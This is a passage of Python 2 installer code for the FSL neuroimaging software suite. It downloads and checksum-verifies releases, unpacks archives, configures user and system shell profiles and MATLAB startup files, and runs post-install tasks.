try:
return dict.__getitem__(self, item)
except KeyError:
value = self[item] = type(self)()
return value
def freeze(self):
'''Returns a dict representation of an AutoDict'''
frozen = {}
for k, v in self.items():
if type(v) == type(self):
frozen[k] = v.freeze()
else:
frozen[k] = v
return frozen
def get_csv_dict(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
manifest_reader = csv.reader(
url, delimiter=',', quoting=csv.QUOTE_MINIMAL)
a_dict = AutoDict()
for line in manifest_reader:
MsgUser.debug(line)
if line[0] == 'feeds':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'sources':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'installer':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
else:
# Install package or alias
if line[2] == 'alias':
items = iter(line[4:])
base_dict = dict(zip(items, items))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])] = base_dict
else:
items = iter(line[5:])
base_dict = dict(zip(items, items))
MsgUser.debug(
",".join(
(line[0], line[1], line[2], line[3], line[4])))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])][
str(line[4])] = base_dict
except OpenUrlError, e:
raise ServerFailure(str(e))
MsgUser.debug(a_dict)
return a_dict.freeze()
class InvalidVersion(Exception):
pass
def get_web_version_and_details(
server_url=Settings.mirror,
request_version=None):
if request_version is None:
details = latest_release(server_url)
try:
version = Version(details['version'])
except KeyError:
try:
redirect = details['redirect']
raise DownloadError(
"Installer not supported on this platform."
"Please visit %s for download instructions" % redirect)
except KeyError:
MsgUser.debug(
"Can't find version or redirect - %s" % details)
raise DownloadError(
"Unsupported OS"
)
else:
MsgUser.debug("Requested version %s" % request_version)
releases = get_releases(server_url)
try:
version = Version(request_version)
except ValueError:
raise DownloadError(
"%s doesn't look like a version" % request_version)
if request_version not in releases.keys():
raise DownloadError(
"%s isn't an available version" % request_version)
details = releases[request_version]
return (version, details)
def download_release(
server_url=Settings.mirror, to_temp=False,
request_version=None, skip_verify=False,
keep=False, source_code=False, feeds=False):
(version, details) = get_web_version_and_details(
server_url, request_version)
if request_version is None:
request_version = str(version)
if source_code or feeds:
if source_code:
extra_type = 'sources'
MsgUser.message("Downloading source code")
else:
extra_type = 'feeds'
MsgUser.message("Downloading FEEDS")
try:
releases = get_extra(server_url, extra_type)
except ExtraDownloadError, e:
raise DownloadError(
"Unable to find details for %s" % (extra_type)
)
to_temp = False
try:
details = releases[request_version]
except KeyError:
raise DownloadError(
"%s %s isn't available" % (request_version, extra_type)
)
MsgUser.debug(details)
if to_temp:
try:
(_, local_filename) = temp_file_name(close=True)
except Exception, e:
MsgUser.debug("Error getting temporary file name %s" % (str(e)))
raise DownloadError("Unable to begin download")
else:
local_filename = details['filename']
if os.path.exists(local_filename):
if os.path.isfile(local_filename):
MsgUser.message("%s exists" % (local_filename))
overwrite = Settings.inst_qus.ask_question('overwrite')
if overwrite:
MsgUser.warning(
"Erasing existing file %s" % local_filename)
try:
os.remove(local_filename)
except Exception:
raise DownloadError(
"Unabled to remove local file %s - remove"
" it and try again" % local_filename)
else:
raise DownloadError("Aborting download")
else:
raise DownloadError(
"There is a directory named %s "
"- cannot overwrite" % local_filename)
MsgUser.debug(
"Downloading to file %s "
"(this may take some time)." % (local_filename))
MsgUser.message(
"Downloading...")
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), details['filename']))
download_file(
url=file_url,
localf=local_filename)
if (not skip_verify and
(details['checksum'] !=
file_checksum(local_filename, details['checksum_type']))):
raise DownloadError('Downloaded file fails checksum')
MsgUser.ok("File downloaded")
except DownloadFileError, e:
MsgUser.debug(str(e))
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
raise DownloadError(str(e))
else:
downloaded = True
return (local_filename, version, details)
class DownloadError(Exception):
pass
def shell_config(shell, fsldir, skip_root=False):
MsgUser.debug("Building environment for %s" % (shell))
env_lines = ''
if shell in BOURNE_SHELLS:
if skip_root:
env_lines += '''if [ -x /usr/bin/id ]; then
if [ -z "$EUID" ]; then
# ksh and dash doesn't setup the EUID environment var
EUID=`id -u`
fi
fi
if [ "$EUID" != "0" ]; then
'''
env_lines += '''
# FSL Setup
FSLDIR=%s
PATH=${FSLDIR}/bin:${PATH}
export FSLDIR PATH
. ${FSLDIR}/etc/fslconf/fsl.sh
'''
if skip_root:
env_lines += '''fi'''
match = "FSLDIR="
replace = "FSLDIR=%s"
elif shell in C_SHELLS:
if skip_root:
env_lines += '''if ( $uid != 0 ) then
'''
env_lines += '''
# FSL Setup
setenv FSLDIR %s
setenv PATH ${FSLDIR}/bin:${PATH}
source ${FSLDIR}/etc/fslconf/fsl.csh
'''
if skip_root:
env_lines += '''
endif'''
match = "setenv FSLDIR"
replace = "setenv FSLDIR %s"
elif shell == 'matlab':
env_lines = '''
%% FSL Setup
setenv( 'FSLDIR', '%s' );
setenv('FSLOUTPUTTYPE', 'NIFTI_GZ');
fsldir = getenv('FSLDIR');
fsldirmpath = sprintf('%%s/etc/matlab',fsldir);
path(path, fsldirmpath);
clear fsldir fsldirmpath;
'''
match = "setenv( 'FSLDIR',"
replace = "setenv( 'FSLDIR', '%s' );"
else:
raise ValueError("Unknown shell type %s" % shell)
return (env_lines % (fsldir), match, replace % (fsldir))
def get_profile(shell):
home = os.path.expanduser("~")
dotprofile = os.path.join(home, '.profile')
if shell == 'bash':
profile = os.path.join(home, '.bash_profile')
if not os.path.isfile(profile) and os.path.isfile(dotprofile):
profile = dotprofile
elif shell == 'zsh':
profile = os.path.join(home, '.zprofile')
# ZSH will never source .profile
elif shell == 'sh':
profile = dotprofile
else:
cshprofile = os.path.join(home, '.cshrc')
if shell == 'csh':
profile = cshprofile
elif shell == 'tcsh':
profile = os.path.join(home, '.tcshrc')
if not os.path.isfile(profile) and os.path.isfile(cshprofile):
profile = cshprofile
else:
raise ValueError("Unsupported shell")
return profile
class FixFslDirError(Exception):
pass
def fix_fsldir(shell, fsldir):
(_, match, replace) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug(
"Editing %s, replacing line beginning:%s with %s." %
(profile, match, replace))
try:
edit_file(profile, line_starts_replace, match, replace, False)
except EditFileError, e:
raise FixFslDirError(str(e))
class AddFslDirError(Exception):
pass
def add_fsldir(shell, fsldir):
(env_lines, _, _) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug("Adding %s to %s" % (env_lines, profile))
try:
add_to_file(profile, env_lines, False)
except AddToFileError, e:
raise AddFslDirError(str(e))
class ConfigureMatlabError(Exception):
pass
class ConfigureMatlabWarn(Exception):
pass
def configure_matlab(fsldir, m_startup='', c_file=True):
'''Setup your startup.m file to enable FSL MATLAB functions to work'''
(mlines, match, replace) = shell_config('matlab', fsldir)
if m_startup == '':
m_startup = os.path.join(
os.path.expanduser('~'), 'Documents', 'MATLAB', 'startup.m')
if os.path.exists(m_startup):
# Check if already configured
MsgUser.debug("Looking for %s in %s" % (match, m_startup))
if file_contains(m_startup, match):
try:
MsgUser.debug('Updating MATLAB startup file.')
edit_file(
m_startup, line_starts_replace,
match, replace, False)
except EditFileError, e:
raise ConfigureMatlabError(str(e))
else:
MsgUser.debug('Adding FSL settings to MATLAB.')
try:
add_to_file(m_startup, mlines, False)
except AddToFileError, e:
raise ConfigureMatlabError(str(e))
elif c_file:
# No startup.m file found. Create one
try:
MsgUser.debug('No MATLAB startup.m file found, creating one.')
if not os.path.isdir(os.path.dirname(m_startup)):
MsgUser.debug('No MATLAB startup.m file found, creating one.')
os.mkdir(os.path.dirname(m_startup))
create_file(m_startup, mlines, False)
except (OSError, CreateFileError), e:
MsgUser.debug(
'Unable to create ~/Documents/MATLAB/ folder or startup.m file,'
' cannot configure (%).' % (str(e)))
raise ConfigureMatlabError(
"Unable to create your ~/Documents/MATLAB/ folder or startup.m, "
"so cannot configure MATLAB for FSL.")
else:
MsgUser.debug('MATLAB may not be installed, doing nothing.')
raise ConfigureMatlabWarn("I can't tell if you have MATLAB installed.")
class SetupEnvironmentError(Exception):
pass
class SetupEnvironmentSkip(Exception):
pass
def setup_system_environment(fsldir):
'''Add a system-wide profile setting up FSL for all users.
Only supported on Redhat/Centos'''
profile_d = '/etc/profile.d'
profile_files = ['fsl.sh', 'fsl.csh']
exceptions = []
skips = []
if os.getuid() != 0:
sudo = True
else:
sudo = False
if os.path.isdir(profile_d):
for profile in profile_files:
pf = profile.split('.')[1]
(lines, match, replace) = shell_config(pf, fsldir)
this_profile = os.path.join(profile_d, profile)
if os.path.exists(this_profile):
# Already has a profile file
# Does it contain an exact match for current FSLDIR?
match = file_contains_1stline(this_profile, replace)
if match != '':
# If there is an fsl.(c)sh then just fix
# the entry for FSLDIR
MsgUser.debug(
"Fixing %s for FSLDIR location." % (this_profile))
try:
edit_file(
this_profile, line_starts_replace,
match, replace, sudo)
except EditFileError, e:
exceptions.append(str(e))
else:
# No need to do anything
MsgUser.debug(
"%s already configured - skipping." %
(this_profile))
skips.append(profile)
else:
# Create the file
try:
create_file(this_profile, lines, sudo)
except CreateFileError, e:
exceptions.append(str(e))
else:
raise SetupEnvironmentError(
"No system-wide configuration folder found - Skipped")
if exceptions:
raise SetupEnvironmentError(".".join(exceptions))
if skips:
raise SetupEnvironmentSkip(".".join(skips))
def setup_environment(fsldir=None, system=False, with_matlab=False):
'''Setup the user's environment so that their
terminal finds the FSL tools etc.'''
# Check for presence of profile file:
if fsldir is None:
fsldir = get_fsldir()
user_shell = which_shell()
MsgUser.debug("User's shell is %s" % (user_shell))
try:
(profile_lines, _, _) = shell_config(user_shell, fsldir)
profile = get_profile(user_shell)
except ValueError, e:
raise SetupEnvironmentError(str(e))
cfile = False
if not os.path.isfile(profile):
MsgUser.debug("User is missing a shell setup file.")
cfile = True
if cfile:
MsgUser.debug("Creating file %s" % (profile))
try:
create_file(profile, profile_lines, False)
except CreateFileError, e:
raise SetupEnvironmentError(
"Unable to create profile %s" % (profile))
else:
# Check if user already has FSLDIR set
MsgUser.message("Setting up FSL software...")
try:
if file_contains(profile, "FSLDIR"):
MsgUser.debug("Updating FSLDIR entry.")
fix_fsldir(user_shell, fsldir)
else:
MsgUser.debug("Adding FSLDIR entry.")
add_fsldir(user_shell, fsldir)
except (AddFslDirError, FixFslDirError), e:
raise SetupEnvironmentError(
"Unable to update your profile %s"
" with FSL settings" % (profile))
if with_matlab:
MsgUser.debug("Setting up MATLAB")
try:
configure_matlab(fsldir)
except ConfigureMatlabError, e:
MsgUser.debug(str(e))
raise SetupEnvironmentError(str(e))
except ConfigureMatlabWarn, e:
MsgUser.skipped(str(e))
class PostInstallError(Exception):
pass
class InstallArchiveError(Exception):
pass
class UnknownArchiveType(Exception):
pass
def archive_type(archive):
'''Determine file type based on extension and check
that file looks like this file type'''
archive_types = {
'gzip': ('tar', '-z'),
'bzip2': ('tar', '-j'),
'zip': ('zip', ''), }
try:
file_type = run_cmd("file %s" % (archive))
except RunCommandError, e:
raise UnknownArchiveType(str(e))
file_type = file_type.lower()
for f_type in ('gzip', 'bzip2', 'zip', ):
if f_type in file_type:
return archive_types[f_type]
raise UnknownArchiveType(archive)
def asl_gui_604_patch(fsldir, as_root=False):
'''
fsl 6.0.4 shipped with a broken fsleyes preview in asl_gui.
This function applies the simple patch to any new installation
that downloads FSL 6.0.4 using the fslinstaller.
1. parse fsl version
2. if version == 6.0.4 apply asl_gui patch, else do nothing and return
to test this patch with an existing fsl 6.0.4:
1. make a minimal $FSLDIR folder structure
- cd ~
- mkdir fsl_test
- cd fsl_test
- mkdir fsl
- cp -r $FSLDIR/etc fsl/
- cp -r $FSLDIR/python fsl/
- mkdir fsl/bin
2. tar it up
- tar -czf fsl-6.0.4-centos7_64.tar.gz fsl
- rm -r fsl # remove the fsl folder after tar-ing
3. run a test python install from the tar file
- be sure to use python 2.X (e.g. 2.7 works fine)
- python fslinstaller.py -f ~/fsl_test/fsl-6.0.4-centos7_64.tar.gz -d ~/fsl_test/fsl -p -M -D
'''
asl_file = os.path.join(fsldir, 'python', 'oxford_asl', 'gui', 'preview_fsleyes.py') #$FSLDIR/python/oxford_asl/gui/preview_fsleyes.py
vfile = os.path.join(fsldir, 'etc', 'fslversion')
vstring = ''
with open(vfile, 'r') as f:
vstring = f.readline()
v = vstring.split(':')[0] # e.g. 6.0.4:wkj2w3jh
if v == '6.0.4':
MsgUser.message("Patching asl_gui for fsl 6.0.4")
tfile = os.path.join(tempfile.mkdtemp(), "preview_fsleyes.py")
# backup asl_file
run_cmd_displayoutput('cp {} {}.bkup'.format(asl_file, asl_file), as_root=as_root)
# copy asl_file to tempfile
run_cmd_displayoutput('cp {} {}'.format(asl_file, tfile), as_root=as_root)
# ensure script can open temp file
run_cmd_displayoutput('chmod 775 {}'.format(tfile), as_root=as_root)
for line in fileinput.input(files=tfile, inplace=True):
line = re.sub('parent=parent, ready=ready', 'ready=ready, raiseErrors=True', line.rstrip())
print(line)
run_cmd_displayoutput('cp {} {}'.format(tfile, asl_file), as_root=as_root)
os.remove(tfile)
def post_install(
fsldir, settings, script="post_install.sh", quiet=False,
app_links=False, x11=False):
MsgUser.message("Performing post install tasks")
if is_writeable(fsldir):
as_root = False
elif is_writeable_as_root(fsldir):
as_root = True
else:
raise PostInstallError(
"Unable to write to target folder (%s)" % (fsldir))
install_installer(fsldir)
# apply asl_gui patch if fsl 6.0.4
asl_gui_604_patch(fsldir, as_root=as_root)
script_path = os.path.join(fsldir, Settings.post_inst_dir, script)
if x11:
try:
check_X11(settings.x11)
except CheckX11Warning, e:
MsgUser.warning(str(e))
else:
MsgUser.ok("X11 (required for GUIs) found")
if os.path.exists(script_path):
MsgUser.debug("Found post-install script %s" % (script_path))
if not os.access(script_path, os.X_OK):
raise PostInstallError(
"Unable to run post install script %s" % (script_path)
)
script_opts = '-f "%s"' % (fsldir)
if quiet:
script_opts += " -q"
command_line = " ".join((script_path, script_opts))
try:
run_cmd_displayoutput(command_line, as_root=as_root)
except RunCommandError, e:
raise PostInstallError(
"Error running post installation script (error %s)"
" - check the install log" % (str(e))
)
# Work around for mistake in 5.0.10 post setup script
mal = os.path.join(
fsldir, Settings.post_inst_dir,
'make_applications_links.sh')
if (os.path.exists(mal) and
not file_contains(script_path, "make_applications_links.sh")):
MsgUser.debug(
"Work around necessary for missing app link creation")
else:
app_links = False
if app_links:
try:
make_applications_links(fsldir, settings.applications)
except MakeApplicationLinksError, e:
for message in e.app_messages.values():
MsgUser.warning(message)
else:
MsgUser.ok("/Applications links created/updated")
MsgUser.ok("Post installation setup complete")
def install_archive(archive, fsldir=None):
def clean_up_temp():
try:
safe_delete(tempfolder, as_root)
except SafeDeleteError, sd_e:
MsgUser.debug(
"Unable to clean up temporary folder! "
"%s" % (str(sd_e)))
if not os.path.isfile(archive):
raise InstallError("%s isn't a file" % (archive))
if not fsldir:
try:
fsldir = get_fsldir(specified_dir=fsldir, install=True)
except GetFslDirError, e:
raise InstallError(str(e))
MsgUser.debug("Requested install of %s as %s" % (archive, fsldir))
if os.path.exists(fsldir):
# move old one out of way
MsgUser.debug("FSL version already installed")
keep_old = Settings.inst_qus.ask_question('del_old')
else:
keep_old = False
install_d = os.path.dirname(fsldir)
MsgUser.debug("Checking %s is writeable." % (install_d))
if is_writeable(install_d):
as_root = False
elif is_writeable_as_root(install_d):
as_root = True
else:
raise InstallArchiveError(
"Unable to write to target folder (%s), "
"even as a super user." % (install_d))
MsgUser.debug("Does %s require root for deletion? %s" % (
install_d, as_root))
try:
unarchive, ua_option = archive_type(archive)
except UnknownArchiveType, e:
raise InstallArchiveError(str(e))
# Generate a temporary name - eg fsl-<mypid>-date
tempname = '-'.join(('fsl', str(os.getpid()), str(time.time())))
tempfolder = os.path.join(install_d, tempname)
try:
run_cmd_dropstdout("mkdir %s" % (tempfolder), as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError(
"Unable to create folder to install into.")
MsgUser.debug(
"Unpacking %s into folder %s." % (archive, tempfolder))
try:
if unarchive == 'tar':
unpack_cmd = 'tar -C %s -x %s -o -f %s' % (
tempfolder, ua_option, archive)
elif unarchive == 'zip':
MsgUser.debug(
"Calling unzip %s %s" % (ua_option, archive)
)
unpack_cmd = 'unzip %s %s' % (ua_option, archive)
try:
run_cmd_dropstdout(unpack_cmd, as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError("Unable to unpack FSL.")
new_fsl = os.path.join(tempfolder, 'fsl')
if os.path.exists(fsldir):
# move old one out of way
try:
old_version = get_installed_version(fsldir)
except (NotAFslVersion, GetInstalledVersionError), e:
if keep_old:
old_version = Version('0.0.0')
MsgUser.warning(
"The contents of %s doesn't look like an "
"FSL installation! - "
"moving to fsl-0.0.0" % (fsldir))
old_fsl = '-'.join((fsldir, str(old_version)))
if os.path.exists(old_fsl):
MsgUser.debug(
"Looks like there is another copy of the "
"old version of FSL - deleting...")
try:
safe_delete(old_fsl, as_root)
except SafeDeleteError, e:
raise InstallError(
";".join((
"Install location already has a "
"%s - I've tried to delete it but"
" failed" % (old_fsl), str(e))))
if keep_old:
try:
MsgUser.debug(
"Moving %s to %s" % (fsldir, old_fsl))
move(fsldir, old_fsl, as_root)
MsgUser.message(
'''You can find your archived version of FSL in %s.
If you wish to restore it, remove %s and rename %s to %s''' % (
old_fsl, fsldir, old_fsl, fsldir))
except MoveError, mv_e:
# failed to move the old version
MsgUser.debug(
"Failed to move old version "
"- %s" % (str(mv_e)))
raise InstallError(
"Failed to backup old version (%s)" % (str(mv_e)))
else:
MsgUser.debug("Removing existing FSL install")
try:
safe_delete(fsldir, as_root)
MsgUser.debug("Deleted %s." % (fsldir))
except SafeDeleteError, e:
raise InstallError(
"Failed to delete %s - %s." % (fsldir, str(e)))
else:
old_fsl = ''
try:
MsgUser.debug("Moving %s to %s" % (new_fsl, fsldir))
move(new_fsl, fsldir, as_root)
except MoveError, e:
# Unable to move new install into place
MsgUser.debug(
"Move failed - %s." % (str(e)))
raise InstallError(
'Failed to move new version into place.')
except InstallError, e:
clean_up_temp()
raise InstallArchiveError(str(e))
clean_up_temp()
MsgUser.debug("Install complete")
MsgUser.ok("FSL software installed.")
return fsldir
def check_for_updates(url, fsldir, requested_v=None):
# Start an update
MsgUser.message("Looking for new version.")
try:
this_version = get_installed_version(fsldir)
except GetInstalledVersionError, e:
# We can't find an installed version of FSL!
raise InstallError(str(e))
else:
MsgUser.debug("You have version %s" % (this_version))
if not requested_v:
version = Version(latest_release(url)['version'])
else:
try:
version = Version(requested_v)
except NotAFslVersion:
raise InstallError(
"%s doesn't look like a version" % requested_v)
if version > this_version:
# Update Available
if version.major > this_version.major:
# We don't support patching between major
# versions so download a fresh copy
return (UPGRADE, version)
else:
return (UPDATE, version)
else:
return (CURRENT, None)
class MakeApplicationLinksError(Exception):
def __init__(self, *args):
super(MakeApplicationLinksError, self).__init__(*args)
try:
self.app_messages = args[0]
except IndexError:
self.app_messages = []
def make_applications_links(fsldir, apps):
'''Create symlinks in /Applications'''
MsgUser.message("Creating Application links...")
results = {}
for app in apps:
app_location = os.path.join('/Applications', os.path.basename(app))
app_target = os.path.join(fsldir, app)
create_link = True
MsgUser.debug("Looking for existing link %s" % (app_location))
if os.path.lexists(app_location):
MsgUser.debug(
"Is a link: %s; realpath: %s" % (
os.path.islink(app_location),
os.path.realpath(app_location)))
if os.path.islink(app_location):
MsgUser.debug("A link already exists.")
if os.path.realpath(app_location) != app_target:
MsgUser.debug(
"Deleting old (incorrect) link %s" % (app_location))
try:
run_cmd_dropstdout("rm " + app_location, as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to remove broken"
" link to %s (%s)." % (app_target, str(e)))
results[app] = 'Unable to remove broken link to %s' % (
app_target)
create_link = False
else:
MsgUser.debug("Link is correct, skipping.")
create_link = False
else:
MsgUser.debug(
"%s doesn't look like a symlink, "
"so let's not delete it." % (app_location))
results[app] = (
"%s is not a link so hasn't been updated to point at the "
"new FSL install.") % (app_location)
create_link = False
if create_link:
MsgUser.debug('Create a link for %s' % (app))
if os.path.exists(app_target):
try:
run_cmd_dropstdout(
"ln -s %s %s" % (app_target, app_location),
as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to create link to %s (%s)." % (
app_target, str(e)))
results[app] = (
'Unable to create link to %s.') % (app_target)
else:
MsgUser.debug(
'Unable to find application'
' %s to link to.') % (app_target)
if results:
raise MakeApplicationLinksError(results)
class CheckX11Warning(Exception):
pass
def check_X11(x11):
'''Function to find X11 install on Mac OS X and confirm it is compatible.
Advise user to download Xquartz if necessary'''
MsgUser.message(
"Checking for X11 windowing system (required for FSL GUIs).")
xbin = ''
for x in x11['apps']:
if os.path.exists(os.path.join(x11['location'], x)):
xbin = x
if xbin != '':
# Find out what version is installed
x_v_cmd = [
'/usr/bin/mdls', '-name',
'kMDItemVersion', os.path.join(x11['location'], xbin)]
try:
cmd = Popen(x_v_cmd, stdout=PIPE, stderr=STDOUT)
(vstring, _) = cmd.communicate()
except Exception, e:
raise CheckX11Warning(
"Unable to check X11 version (%s)" % (str(e)))
if cmd.returncode:
MsgUser.debug("Error finding the version of X11 (%s)" % (vstring))
# App found, but can't tell version, warn the user
raise CheckX11Warning(
"X11 (required for FSL GUIs) is installed but I"
" can't tell what the version is.")
else:
# Returns:
# kMDItemVersion = "2.3.6"\n
(_, _, version) = vstring.strip().split()
if version.startswith('"'):
version = version[1:-1]
if version in x11['bad_versions']:
raise CheckX11Warning(
"X11 (required for FSL GUIs) is a version that"
" is known to cause problems. We suggest you"
" upgrade to the latest XQuartz release from "
"%s" % (x11['download_url']))
else:
MsgUser.debug(
"X11 found and is not a bad version"
" (%s: %s)." % (xbin, version))
else:
# No X11 found, warn the user
raise CheckX11Warning(
"The FSL GUIs require the X11 window system which I can't"
" find in the usual places. You can download a copy from %s"
" - you will need to install this before the GUIs will"
" function" % (x11['download_url']))
def do_install(options, settings):
MsgUser.message(
shell_colours.bold + settings.title + shell_colours.default)
if options.test_installer:
settings.main_mirror = options.test_installer
this_computer = Host
if not this_computer.supported:
MsgUser.debug("Unsupported host %s %s %s" % (
this_computer.o_s,
this_computer.arch,
this_computer.os_type))
raise InstallError(
"Unsupported host - you could try building from source")
if this_computer.o_s == "linux":
system_environment = True
with_matlab = False
application_links = False
x11 = False
elif this_computer.o_s == "darwin":
system_environment = False
with_matlab = True
application_links = True
x11 = True
else:
MsgUser.debug("Unrecognised OS %s" % (this_computer.o_s))
raise InstallError("Unrecognised OS")
my_uid = os.getuid()
def configure_environment(fsldir, env_all=False, skip=False, matlab=False):
if skip:
return
if env_all:
if system_environment:
# Setup the system-wise environment
try:
setup_system_environment(fsldir)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(
"Failed to configure system-wide profiles "
"with FSL settings: %s" % (str(e)))
except SetupEnvironmentSkip, e:
MsgUser.skipped(
"Some shells already configured: %s" % (str(e)))
else:
MsgUser.debug("System-wide profiles setup.")
MsgUser.ok("System-wide FSL configuration complete.")
else:
MsgUser.skipped(
"System-wide profiles not supported on this OS")
elif my_uid != 0:
# Setup the environment for the current user
try:
setup_environment(fsldir, with_matlab=matlab)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(str(e))
else:
MsgUser.ok(
"User profile updated with FSL settings, you will need "
"to log out and back in to use the FSL tools.")
if my_uid != 0:
if options.quiet:
settings.inst_qus.defaults = True
print '''
We may need administrator rights, but you have specified fully automated
mode - you may still be asked for an admin password if required.'''
print '''
To install fully automatedly, either ensure this is running as the root
user (use sudo) or that you can write to the folder you wish to install
FSL in.'''
elif (not options.download and
not options.list_versions and
not options.list_builds and
not options.get_source and
not options.get_feeds):
MsgUser.warning(
'''Some operations of the installer require administative rights,
for example installing into the default folder of /usr/local.
If your account is an 'Administrator' (you have 'sudo' rights)
then you will be prompted for your administrator password
when necessary.''')
if not options.d_dir and options.quiet:
raise InstallError(
"Quiet mode requires you to specify the install location"
" (e.g. /usr/local)")
if not options.quiet and not (options.list_versions or options.list_builds):
MsgUser.message(
"When asked a question, the default answer is given in square "
"brackets.\nHit the Enter key to accept this default answer.")
if options.env_only and my_uid != 0:
configure_environment(
get_fsldir(specified_dir=options.d_dir),
options.env_all)
return
if options.archive:
if not options.skipchecksum:
if not options.checksum:
raise InstallError(
"No checksum provided and checking not disabled")
else:
checksummer = globals()[options.checksum_type + 'File']
if options.checksum != checksummer(options.archive):
raise InstallError("FSL archive doesn't match checksum")
else:
MsgUser.ok("FSL Package looks good")
arc_version = archive_version(options.archive)
MsgUser.message(
"Installing FSL software version %s..." % (arc_version))
fsldir = install_archive(
archive=options.archive, fsldir=options.d_dir)
try:
post_install(fsldir=fsldir, settings=settings, quiet=options.quiet)
except PostInstallError, e:
raise InstallError(str(e))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
return
# All the following options require the Internet...
try:
settings.mirror = fastest_mirror(
settings.mirrors, settings.mirrors_file)
except SiteNotResponding, e:
# We can't find the FSL site - possibly the internet is down
raise InstallError(e)
try:
self_update(settings.mirror)
except SelfUpdateError, e:
MsgUser.debug("Self update error: %s" % (str(e)))
MsgUser.warning("Error checking for updates to installer - continuing")
if options.list_versions:
# Download a list of available downloads from the webserver
list_releases(settings.mirror)
return
if options.list_builds:
# List all available builds
list_builds(settings.mirror)
return
if options.download:
MsgUser.debug("Attempting to download latest release")
try:
download_release(request_version=options.requestversion,
skip_verify=options.skipchecksum)
except DownloadFileError, e:
raise("Unable to download release %s" % (str(e)))
return
if options.update:
fsldir = get_fsldir()
status, new_v = check_for_updates(settings.mirror, fsldir=fsldir)
if status == UPDATE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('update'):
return
elif status == UPGRADE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('upgrade'):
return
else:
MsgUser.ok("FSL is up-to-date.")
return
if options.get_source:
MsgUser.debug("Attempting to download source")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
source_code=True)
except DownloadFileError, e:
raise("Unable to download source code %s" % (str(e)))
return
if options.get_feeds:
MsgUser.debug("Attempting to download FEEDS")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
feeds=True)
except DownloadFileError, e:
raise("Unable to download FEEDS %s" % (str(e)))
return
try:
(version, details) = get_web_version_and_details(
request_version=options.requestversion
)
if 'redirect' in details:
MsgUser.message("Please download FSL using the instructions here:")
MsgUser.message("%s" % (details['redirect']))
return
fsldir = get_fsldir(specified_dir=options.d_dir, install=True)
reinstall = True
if os.path.exists(fsldir):
inst_version = get_installed_version(fsldir)
if inst_version == version:
reinstall = Settings.inst_qus.ask_question('version_match')
if reinstall:
(fname, version, details) = download_release(
to_temp=True,
request_version=options.requestversion,
skip_verify=options.skipchecksum)
if not details['supported']:
MsgUser.debug(
"This OS is not officially supported -"
" you may experience issues"
)
MsgUser.debug(
"Installing %s from %s (details: %s)" % (
fname, version, details))
MsgUser.message(
"Installing FSL software version %s..." % (version))
install_archive(
archive=fname, fsldir=fsldir)
try:
safe_delete(fname)
except SafeDeleteError, e:
MsgUser.debug(
"Unable to delete downloaded package %s ; %s" % (
fname, str(e)))
if details['notes']:
MsgUser.message(details['notes'])
try:
post_install(
fsldir=fsldir, settings=settings,
quiet=options.quiet, x11=x11,
app_links=application_links)
except PostInstallError, e:
raise InstallError(str(e))
except DownloadError, e:
MsgUser.debug("Unable to download FSL %s" % (str(e)))
raise InstallError("Unable to download FSL")
except InstallArchiveError, e:
MsgUser.debug("Unable to unpack FSL ; %s" % (str(e)))
raise InstallError("Unable to unpack FSL - %s" % (str(e)))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
if details['notes']:
MsgUser.message(details['notes'])
def parse_options(args):
usage = "usage: %prog [options]"
ver = "%%prog %s" % (version)
parser = OptionParser(usage=usage, version=ver)
parser.add_option("-d", "--dest", dest="d_dir",
help="Install into folder given by DESTDIR - "
"e.g. /usr/local/fsl",
metavar="DESTDIR", action="store",
type="string")
parser.add_option("-e", dest="env_only",
help="Only setup/update your environment",
action="store_true")
parser.add_option("-E", dest="env_all",
help="Setup/update the environment for ALL users",
action="store_true")
parser.add_option("-v", help="Print version number and exit",
action="version")
parser.add_option("-c", "--checkupdate", dest='update',
help="Check for FSL updates -"
" needs an internet connection",
action="store_true")
parser.add_option("-o", "--downloadonly", dest="download",
help=SUPPRESS_HELP,
action="store_true")
advanced_group = OptionGroup(
parser, "Advanced Install Options",
"These are advanced install options")
advanced_group.add_option(
"-l", "--listversions", dest="list_versions",
help="List available versions of FSL",
action="store_true")
advanced_group.add_option(
"-b", "--listbuilds", dest="list_builds",
help="List available FSL builds",
action="store_true")
advanced_group.add_option(
"-B", "--fslbuild", dest="requestbuild",
help="Download the specific FSLBUILD of FSL",
metavar="FSLBUILD", action="store",
type="string")
advanced_group.add_option(
"-V", "--fslversion", dest="requestversion",
help="Download the specific version FSLVERSION of FSL",
metavar="FSLVERSION", action="store",
type="string")
advanced_group.add_option(
"-s", "--source", dest="get_source",
help="Download source code for FSL",
action="store_true")
advanced_group.add_option(
"-F", "--feeds", dest="get_feeds",
help="Download FEEDS",
action="store_true")
advanced_group.add_option(
"-q", "--quiet", dest='quiet',
help="Silence all messages - useful if scripting install",
action="store_true")
advanced_group.add_option(
"-p", dest="skip_env",
help="Don't setup the environment",
action="store_true")
parser.add_option_group(advanced_group)
debug_group = OptionGroup(
parser, "Debugging Options",
"These are for use if you have a problem running this installer.")
